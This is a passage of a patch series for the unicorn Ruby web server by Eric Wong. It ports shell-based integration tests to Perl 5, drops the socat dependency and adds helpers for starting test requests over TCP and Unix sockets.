+use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
@@ -34,7 +35,7 @@ Trailer: Content-MD5\r
 EOM
 		my ($buf, $r);
 		while (1) {
-			$r = read($in, $buf, $bs) // die "read: $!";
+			$r = read($in, $buf, $bs);
 			last if $r == 0;
 			printf $out "%x\r\n", length($buf);
 			print $out $buf, "\r\n";
@@ -54,7 +55,7 @@ EOM
 		my ($buf, $r, $len);
 		while ($clen) {
 			$len = $clen > $bs ? $bs : $clen;
-			$r = read($in, $buf, $len) // die "read: $!";
+			$r = read($in, $buf, $len);
 			die 'premature EOF' if $r == 0;
 			print $out $buf;
 			$clen -= $r;
@@ -130,28 +131,28 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /' or die $!;
+	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
-	for (0..1023) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..1023) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on REQUEST_PATH > (12 * 1024)');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /hello-world?a' or die $!;
+	print $c 'GET /hello-world?a';
 	$buf = join('', (0..9));
-	for (0..1023) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..1023) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on QUERY_STRING > (10 * 1024)');
 
 	$c = tcp_connect($srv);
-	print $c 'GET /hello-world#a' or die $!;
+	print $c 'GET /hello-world#a';
 	$buf = join('', (0..9), 'a'..'f');
-	for (0..63) { print $c $buf or die $! }
-	print $c " HTTP/1.0\r\n\r\n" or die $!;
+	for (0..63) { print $c $buf }
+	print $c " HTTP/1.0\r\n\r\n";
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
@@ -159,7 +160,7 @@ if ('bad requests') {
 # input tests
 my ($blob_size, $blob_hash);
 SKIP: {
-	open(my $rh, '<', 't/random_blob') or
+	CORE::open(my $rh, '<', 't/random_blob') or
 		skip "t/random_blob not generated $!", 1;
 	$blob_size = -s $rh;
 	require Digest::SHA;
@@ -167,11 +168,11 @@ SKIP: {
 
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
-		seek($rh, 0, SEEK_SET) // die "seek: $!";
+		seek($rh, 0, SEEK_SET);
 		$c = tcp_connect($srv);
 		$c->autoflush(0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
-		$c->flush or die "flush: $!";
+		$c->flush or die $!;
 		($status, $hdr) = slurp_hdr($c);
 		is(readline($c), $blob_hash, "$sub $path");
 	};
@@ -189,10 +190,10 @@ SKIP: {
 	my $url = "http://$host_port/rack_input";
 	my $do_curl = sub {
 		my (@arg) = @_;
-		pipe(my $cout, $copt->{1}) or die "pipe: $!";
-		open $copt->{2}, '>', "$tmpdir/curl.err" or die $!;
+		pipe(my $cout, $copt->{1});
+		open $copt->{2}, '>', "$tmpdir/curl.err";
 		my $cpid = spawn($curl, '-sSf', @arg, $url, $copt);
-		close(delete $copt->{1}) or die "close: $!";
+		close(delete $copt->{1});
 		is(readline($cout), $blob_hash, "curl @arg response");
 		is(waitpid($cpid, 0), $cpid, "curl @arg exited");
 		is($?, 0, "no error from curl @arg");
@@ -201,7 +202,7 @@ SKIP: {
 
 	$do_curl->(qw(-T t/random_blob));
 
-	seek($rh, 0, SEEK_SET) // die "seek: $!";
+	seek($rh, 0, SEEK_SET);
 	$copt->{0} = $rh;
 	$do_curl->('-T-');
 }
diff --git a/t/lib.perl b/t/lib.perl
index ae9f197..49632cf 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -4,6 +4,7 @@
 package UnicornTest;
 use v5.14;
 use parent qw(Exporter);
+use autodie;
 use Test::More;
 use IO::Socket::INET;
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
@@ -14,7 +15,7 @@ our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
-open($errfh, '>>', "$tmpdir/err.log") or die "open: $!";
+open($errfh, '>>', "$tmpdir/err.log");
 
 sub tcp_server {
 	my %opt = (
@@ -62,14 +63,14 @@ sub tcp_connect {
 sub start_req {
 	my ($srv, @req) = @_;
 	my $c = tcp_connect($srv);
-	print $c @req, "\r\n\r\n" or die "print: $!";
+	print $c @req, "\r\n\r\n";
 	$c;
 }
 
 sub slurp {
-	open my $fh, '<', $_[0] or die "open($_[0]): $!";
+	open my $fh, '<', $_[0];
 	local $/;
-	<$fh>;
+	readline($fh);
 }
 
 sub spawn {
@@ -80,8 +81,8 @@ sub spawn {
 	my $set = POSIX::SigSet->new;
 	$set->fillset or die "sigfillset: $!";
 	sigprocmask(SIG_SETMASK, $set, $old) or die "SIG_SETMASK: $!";
-	pipe(my ($r, $w)) or die "pipe: $!";
-	my $pid = fork // die "fork: $!";
+	pipe(my $r, my $w);
+	my $pid = fork;
 	if ($pid == 0) {
 		close $r;
 		$SIG{__DIE__} = sub {
@@ -94,9 +95,9 @@ sub spawn {
 		my $cfd;
 		for ($cfd = 0; ($cfd < 3) || defined($opt->{$cfd}); $cfd++) {
 			my $io = $opt->{$cfd} // next;
-			my $pfd = fileno($io) // die "fileno($io): $!";
+			my $pfd = fileno($io);
 			if ($pfd == $cfd) {
-				fcntl($io, F_SETFD, 0) // die "F_SETFD: $!";
+				fcntl($io, F_SETFD, 0);
 			} else {
 				dup2($pfd, $cfd) // die "dup2($pfd, $cfd): $!";
 			}
@@ -110,9 +111,7 @@ sub spawn {
 			setpgid(0, $pgid) // die "setpgid(0, $pgid): $!";
 		}
 		$SIG{$_} = 'DEFAULT' for grep(!/^__/, keys %SIG);
-		if (defined(my $cd = $opt->{-C})) {
-			chdir $cd // die "chdir($cd): $!";
-		}
+		if (defined(my $cd = $opt->{-C})) { chdir $cd }
 		$old->delset(POSIX::SIGCHLD) or die "sigdelset CHLD: $!";
 		sigprocmask(SIG_SETMASK, $old) or die "SIG_SETMASK: ~CHLD: $!";
 		@ENV{keys %$env} = values(%$env) if $env;
@@ -162,22 +161,23 @@ sub unicorn {
 # automatically kill + reap children when this goes out-of-scope
 package UnicornTest::AutoReap;
 use v5.14;
+use autodie;
 
 sub new {
 	my (undef, $pid) = @_;
 	bless { pid => $pid, owner => $$ }, __PACKAGE__
 }
 
-sub kill {
+sub do_kill {
 	my ($self, $sig) = @_;
-	CORE::kill($sig // 'TERM', $self->{pid});
+	kill($sig // 'TERM', $self->{pid});
 }
 
 sub join {
 	my ($self, $sig) = @_;
 	my $pid = delete $self->{pid} or return;
-	CORE::kill($sig, $pid) if defined $sig;
-	my $ret = waitpid($pid, 0) // die "waitpid($pid): $!";
+	kill($sig, $pid) if defined $sig;
+	my $ret = waitpid($pid, 0);
 	$ret == $pid or die "BUG: waitpid($pid) != $ret";
 }
 

[-- Attachment #11: 0010-port-t0019-max_header_len.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 5571 bytes --]

From 43c7d73b8b9e6995b5a986b10a8623395e89a538 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:39 +0000
Subject: [PATCH 10/23] port t0019-max_header_len.sh to Perl 5

This was the final socat requirement for integration tests.
I think curl will remain an optional dependency for tests
since it's probably the most widely-installed HTTP client.
---
 GNUmakefile               |  2 +-
 t/README                  |  7 +-----
 t/integration.ru          |  1 +
 t/integration.t           | 43 +++++++++++++++++++++++++++++++---
 t/t0019-max_header_len.sh | 49 ---------------------------------------
 5 files changed, 43 insertions(+), 59 deletions(-)
 delete mode 100755 t/t0019-max_header_len.sh

diff --git a/GNUmakefile b/GNUmakefile
index 5cca189..eab9082 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -125,7 +125,7 @@ $(T_sh): dep $(test_prereq) t/random_blob t/trash/.gitignore
 t/trash/.gitignore : | t/trash
 	echo '*' >$@
 
-dependencies := socat curl
+dependencies := curl
 deps := $(addprefix t/.dep+,$(dependencies))
 $(deps): dep_bin = $(lastword $(subst +, ,$@))
 $(deps):
diff --git a/t/README b/t/README
index 8a5243e..d09c715 100644
--- a/t/README
+++ b/t/README
@@ -10,18 +10,13 @@ to test real-world behavior and Ruby introduces incompatibilities
 at a far faster rate than Perl 5.  Perl is Ruby's older cousin, so
 it should be easy-to-learn for Rubyists.
 
-Old tests are in Bourne shell, but the socat(1) dependency was probably
-too rare compared to Perl 5.
+Old tests are in Bourne shell and slowly being ported to Perl 5.
 
 == Requirements
 
 * {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
 * {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
-
-The following requirements will eventually be dropped.
-
-* {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[https://curl.haxx.se/]
 
 We do not use bashisms or any non-portable, non-POSIX constructs
diff --git a/t/integration.ru b/t/integration.ru
index 98528f6..edc408c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -81,6 +81,7 @@ def rack_input_tests(env)
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
     when '/pid'; [ 200, {}, [ "#$$\n" ] ]
+    else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/integration.t b/t/integration.t
index af17d51..c687655 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -1,15 +1,19 @@
 #!perl -w
 # Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
-# this is the main integration test for things which don't require
-# restarting or signals
+
+# This is the main integration test for fast-ish things to minimize
+# Ruby startup time penalties.
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
-my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
+my $conf = "$tmpdir/u.conf.rb";
+open my $conf_fh, '>', $conf;
+$conf_fh->autoflush(1);
+my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
 END { diag slurp("$tmpdir/err.log") if $tmpdir };
 sub slurp_hdr {
@@ -207,7 +211,40 @@ SKIP: {
 	$do_curl->('-T-');
 }
 
+
 # ... more stuff here
+
+# SIGHUP-able stuff goes here
+
+if ('max_header_len internal API') {
+	undef $c;
+	my $req = 'GET / HTTP/1.0';
+	my $len = length($req."\r\n\r\n");
+	my $fifo = "$tmpdir/fifo";
+	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+	print $conf_fh <<EOM;
+Unicorn::HttpParser.max_header_len = $len
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+	$ar->do_kill('HUP');
+	open my $fifo_fh, '<', $fifo;
+	my $wpid = readline($fifo_fh);
+	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
+	close $fifo_fh;
+	$wpid =~ s/\Apid=// or die;
+	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
+
+	$c = start_req($srv, $req);
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 200\b!, 'minimal request succeeds');
+
+	$c = start_req($srv, 'GET /xxxxxx HTTP/1.0');
+	($status, $hdr) = slurp_hdr($c);
+	like($status, qr!\AHTTP/1\.[01] 413\b!, 'big request fails');
+}
+
+
 undef $ar;
 my @log = slurp("$tmpdir/err.log");
 diag("@log") if $ENV{V};
diff --git a/t/t0019-max_header_len.sh b/t/t0019-max_header_len.sh
deleted file mode 100755
index 6a355b4..0000000
--- a/t/t0019-max_header_len.sh
+++ /dev/null
@@ -1,49 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 5 "max_header_len setting (only intended for Rainbows!)"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	req='GET / HTTP/1.0\r\n\r\n'
-	len=$(printf "$req" | count_bytes)
-	echo Unicorn::HttpParser.max_header_len = $len >> $unicorn_config
-	unicorn -D -c $unicorn_config env.ru
-	unicorn_wait_start
-}
-
-t_begin "minimal request succeeds" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf "$req"
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-
-	fgrep "HTTP/1.1 200 OK" $tmp
-}
-
-t_begin "big request fails" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'GET /xxxxxx HTTP/1.0\r\n\r\n'
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-	fgrep "HTTP/1.1 413" $tmp
-}
-
-dbgcat tmp
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && {
-	check_stderr
-}
-
-t_done

[-- Attachment #12: 0011-test_exec-drop-sd_listen_fds-emulation-test.patch --]
[-- Type: text/x-diff, Size: 1751 bytes --]

From 5d828a4ef7683345bcf2ff659442fed0a6fb7a97 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:40 +0000
Subject: [PATCH 11/23] test_exec: drop sd_listen_fds emulation test

The Perl 5 tests already rely on this implicitly, and there was
never a point when Perl 5 couldn't emulate systemd behavior.
---
 test/exec/test_exec.rb | 33 ---------------------------------
 1 file changed, 33 deletions(-)

diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 2929b2e..1d3a0fd 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -97,39 +97,6 @@ def teardown
     end
   end
 
-  def test_sd_listen_fds_emulation
-    # [ruby-core:69895] [Bug #11336] fixed by r51576
-    return if RUBY_VERSION.to_f < 2.3
-
-    File.open("config.ru", "wb") { |fp| fp.write(HI) }
-    sock = TCPServer.new(@addr, @port)
-
-    [ %W(-l #@addr:#@port), nil ].each do |l|
-      sock.setsockopt(:SOL_SOCKET, :SO_KEEPALIVE, 0)
-
-      pid = xfork do
-        redirect_test_io do
-          # pretend to be systemd
-          ENV['LISTEN_PID'] = "#$$"
-          ENV['LISTEN_FDS'] = '1'
-
-          # 3 = SD_LISTEN_FDS_START
-          args = [ $unicorn_bin ]
-          args.concat(l) if l
-          args << { 3 => sock }
-          exec(*args)
-        end
-      end
-      res = hit(["http://#@addr:#@port/"])
-      assert_equal [ "HI\n" ], res
-      assert_shutdown(pid)
-      assert sock.getsockopt(:SOL_SOCKET, :SO_KEEPALIVE).bool,
-                  'unicorn should always set SO_KEEPALIVE on inherited sockets'
-    end
-  ensure
-    sock.close if sock
-  end
-
   def test_inherit_listener_unspecified
     File.open("config.ru", "wb") { |fp| fp.write(HI) }
     sock = TCPServer.new(@addr, @port)

[-- Attachment #13: 0012-test_exec-drop-test_basic-and-test_config_ru_alt_pat.patch --]
[-- Type: text/x-diff, Size: 1667 bytes --]

From 548593c6b3d52a4bebd52542ad9c423ed2b7252d Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:41 +0000
Subject: [PATCH 12/23] test_exec: drop test_basic and test_config_ru_alt_path

We already have coverage for these basic things elsewhere.
---
 test/exec/test_exec.rb | 24 ------------------------
 1 file changed, 24 deletions(-)

diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 1d3a0fd..55f828e 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -265,16 +265,6 @@ def test_exit_signals
     end
   end
 
-  def test_basic
-    File.open("config.ru", "wb") { |fp| fp.syswrite(HI) }
-    pid = fork do
-      redirect_test_io { exec($unicorn_bin, "-l", "#{@addr}:#{@port}") }
-    end
-    results = retry_hit(["http://#{@addr}:#{@port}/"])
-    assert_equal String, results[0].class
-    assert_shutdown(pid)
-  end
-
   def test_rack_env_unset
     File.open("config.ru", "wb") { |fp| fp.syswrite(SHOW_RACK_ENV) }
     pid = fork { redirect_test_io { exec($unicorn_bin, "-l#@addr:#@port") } }
@@ -638,20 +628,6 @@ def test_read_embedded_cli_switches
     assert_shutdown(pid)
   end
 
-  def test_config_ru_alt_path
-    config_path = "#{@tmpdir}/foo.ru"
-    File.open(config_path, "wb") { |fp| fp.syswrite(HI) }
-    pid = fork do
-      redirect_test_io do
-        Dir.chdir("/")
-        exec($unicorn_bin, "-l#{@addr}:#{@port}", config_path)
-      end
-    end
-    results = retry_hit(["http://#{@addr}:#{@port}/"])
-    assert_equal String, results[0].class
-    assert_shutdown(pid)
-  end
-
   def test_load_module
     libdir = "#{@tmpdir}/lib"
     FileUtils.mkpath([ libdir ])

[-- Attachment #14: 0013-tests-check_stderr-consistently-in-Perl-5-tests.patch --]
[-- Type: text/x-diff, Size: 2415 bytes --]

From cd7ee67fc8ebadec9bdd913d49ed3f214596ea47 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:42 +0000
Subject: [PATCH 13/23] tests: check_stderr consistently in Perl 5 tests

The Bourne shell tests did, so lets not let stuff sneak past us.
---
 t/active-unix-socket.t |  5 ++---
 t/integration.t        |  7 ++-----
 t/lib.perl             | 10 +++++++++-
 3 files changed, 13 insertions(+), 9 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 1241904..c132dc2 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -20,7 +20,7 @@ my $unix_req = sub {
 	print $fh <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u1"
-stderr_path "$tmpdir/err1.log"
+stderr_path "$tmpdir/err.log"
 EOM
 	close $fh;
 
@@ -113,6 +113,5 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 	ok(-S $u1, 'socket stays after SIGTERM');
 }
 
-my @log = slurp("$tmpdir/err.log");
-diag("@log") if $ENV{V};
+check_stderr;
 done_testing;
diff --git a/t/integration.t b/t/integration.t
index c687655..939dc24 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -246,11 +246,8 @@ EOM
 
 
 undef $ar;
-my @log = slurp("$tmpdir/err.log");
-diag("@log") if $ENV{V};
-my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
-is_deeply(\@err, [], 'no unexpected errors in stderr');
-is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+
+check_stderr;
 
 undef $tmpdir;
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 49632cf..315ef2d 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -11,12 +11,20 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req which spawn);
+	SEEK_SET tcp_host_port start_req which spawn check_stderr);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
 open($errfh, '>>', "$tmpdir/err.log");
 
+sub check_stderr () {
+	my @log = slurp("$tmpdir/err.log");
+	diag("@log") if $ENV{V};
+	my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
+	is_deeply(\@err, [], 'no unexpected errors in stderr');
+	is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,

[-- Attachment #15: 0014-tests-consistent-tcp_start-and-unix_start-across-Per.patch --]
[-- Type: text/x-diff, Size: 8017 bytes --]

From 0dcd8bd569813a175ad43837db3ab07019a95b99 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:43 +0000
Subject: [PATCH 14/23] tests: consistent tcp_start and unix_start across Perl
 5 tests

I'll be using Unix sockets more in tests since there's no
risk of system-wide conflicts with TCP port allocation.
Furthermore, curl supports `--unix-socket' nowadays; so
there's little reason to rely on TCP sockets and the conflicts
they bring in tests.
---
 t/active-unix-socket.t | 13 ++++---------
 t/integration.t        | 28 ++++++++++++++--------------
 t/lib.perl             | 30 ++++++++++++++++--------------
 3 files changed, 34 insertions(+), 37 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index c132dc2..8723137 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -10,11 +10,6 @@ my %to_kill;
 END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
-my $unix_req = sub {
-	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
-	print $s @_, "\r\n\r\n";
-	$s;
-};
 {
 	open my $fh, '>', "$tmpdir/u1.conf.rb";
 	print $fh <<EOM;
@@ -53,7 +48,7 @@ is($?, 0, 'daemonized 1st process');
 chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
 like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
 
-chomp(my $worker_pid = readline($unix_req->($u1, 'GET /pid')));
+chomp(my $worker_pid = readline(unix_start($u1, 'GET /pid')));
 like($worker_pid, qr/\A\d+\z/s, 'captured worker pid');
 ok(kill(0, $worker_pid), 'worker is kill-able');
 
@@ -65,7 +60,7 @@ isnt($?, 0, 'conflicting PID file fails to start');
 chomp(my $pidf = slurp("$tmpdir/u.pid"));
 is($pidf, $to_kill{u1}, 'pid file contents unchanged after start failure');
 
-chomp(my $pid2 = readline($unix_req->($u1, 'GET /pid')));
+chomp(my $pid2 = readline(unix_start($u1, 'GET /pid')));
 is($worker_pid, $pid2, 'worker PID unchanged');
 
 
@@ -73,7 +68,7 @@ is($worker_pid, $pid2, 'worker PID unchanged');
 unicorn('-c', "$tmpdir/u3.conf.rb", @uarg)->join;
 isnt($?, 0, 'conflicting UNIX socket fails to start');
 
-chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+chomp($pid2 = readline(unix_start($u1, 'GET /pid')));
 is($worker_pid, $pid2, 'worker PID still unchanged');
 
 chomp($pidf = slurp("$tmpdir/u.pid"));
@@ -101,7 +96,7 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
 	like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
 
-	chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+	chomp($pid2 = readline(unix_start($u1, 'GET /pid')));
 	like($pid2, qr/\A\d+\z/, 'worker running');
 
 	ok(kill('TERM', delete $to_kill{u1}), 'SIGTERM restarted daemon');
diff --git a/t/integration.t b/t/integration.t
index 939dc24..b33e3c3 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -70,7 +70,7 @@ EOM
 my ($c, $status, $hdr);
 
 # response header tests
-$c = start_req($srv, 'GET /rack-2-newline-headers HTTP/1.0');
+$c = tcp_start($srv, 'GET /rack-2-newline-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
 my $orig_200_status = $status;
@@ -89,7 +89,7 @@ SKIP: { # Date header check
 };
 
 
-$c = start_req($srv, 'GET /rack-3-array-headers HTTP/1.0');
+$c = tcp_start($srv, 'GET /rack-3-array-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
@@ -97,7 +97,7 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	my $c = start_req($srv, 'GET /env_dump');
+	my $c = tcp_start($srv, 'GET /env_dump');
 	my $json = do { local $/; readline($c) };
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
@@ -107,17 +107,17 @@ SKIP: {
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-$c = start_req($srv, 'GET /nil-header-value HTTP/1.0');
+$c = tcp_start($srv, 'GET /nil-header-value HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
-	$c = start_req($srv, 'POST /tweak-status-code HTTP/1.0');
+	$c = tcp_start($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
 
-	$c = start_req($srv, 'POST /restore-status-code HTTP/1.0');
+	$c = tcp_start($srv, 'POST /restore-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	is($status, $orig_200_status, 'original status restored');
 }
@@ -130,12 +130,12 @@ SKIP: {
 }
 
 if ('bad requests') {
-	$c = start_req($srv, 'GET /env_dump HTTP/1/1');
+	$c = tcp_start($srv, 'GET /env_dump HTTP/1/1');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
-	$c = tcp_connect($srv);
-	print $c 'GET /';
+	$c = tcp_start($srv);
+	print $c 'GET /';;
 	my $buf = join('', (0..9), 'ab');
 	for (0..1023) { print $c $buf }
 	print $c " HTTP/1.0\r\n\r\n";
@@ -143,7 +143,7 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on REQUEST_PATH > (12 * 1024)');
 
-	$c = tcp_connect($srv);
+	$c = tcp_start($srv);
 	print $c 'GET /hello-world?a';
 	$buf = join('', (0..9));
 	for (0..1023) { print $c $buf }
@@ -152,7 +152,7 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on QUERY_STRING > (10 * 1024)');
 
-	$c = tcp_connect($srv);
+	$c = tcp_start($srv);
 	print $c 'GET /hello-world#a';
 	$buf = join('', (0..9), 'a'..'f');
 	for (0..63) { print $c $buf }
@@ -173,7 +173,7 @@ SKIP: {
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
 		seek($rh, 0, SEEK_SET);
-		$c = tcp_connect($srv);
+		$c = tcp_start($srv);
 		$c->autoflush(0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
 		$c->flush or die $!;
@@ -235,11 +235,11 @@ EOM
 	$wpid =~ s/\Apid=// or die;
 	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
 
-	$c = start_req($srv, $req);
+	$c = tcp_start($srv, $req);
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200\b!, 'minimal request succeeds');
 
-	$c = start_req($srv, 'GET /xxxxxx HTTP/1.0');
+	$c = tcp_start($srv, 'GET /xxxxxx HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 413\b!, 'big request fails');
 }
diff --git a/t/lib.perl b/t/lib.perl
index 315ef2d..1d6e78d 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,8 +10,8 @@ use IO::Socket::INET;
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
-our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req which spawn check_stderr);
+our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn $tmpdir $errfh
+	SEEK_SET tcp_host_port which spawn check_stderr unix_start);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -55,26 +55,28 @@ sub tcp_host_port {
 	}
 }
 
-sub tcp_connect {
-	my ($dest, %opt) = @_;
-	my $addr = tcp_host_port($dest);
-	my $s = ref($dest)->new(
+sub unix_start ($@) {
+	my ($dst, @req) = @_;
+	my $s = IO::Socket::UNIX->new(Peer => $dst, Type => SOCK_STREAM) or
+		BAIL_OUT "unix connect $dst: $!";
+	$s->autoflush(1);
+	print $s @req, "\r\n\r\n" if @req;
+	$s;
+}
+
+sub tcp_start ($@) {
+	my ($dst, @req) = @_;
+	my $addr = tcp_host_port($dst);
+	my $s = ref($dst)->new(
 		Proto => 'tcp',
 		Type => SOCK_STREAM,
 		PeerAddr => $addr,
-		%opt,
 	) or BAIL_OUT "failed to connect to $addr: $!";
 	$s->autoflush(1);
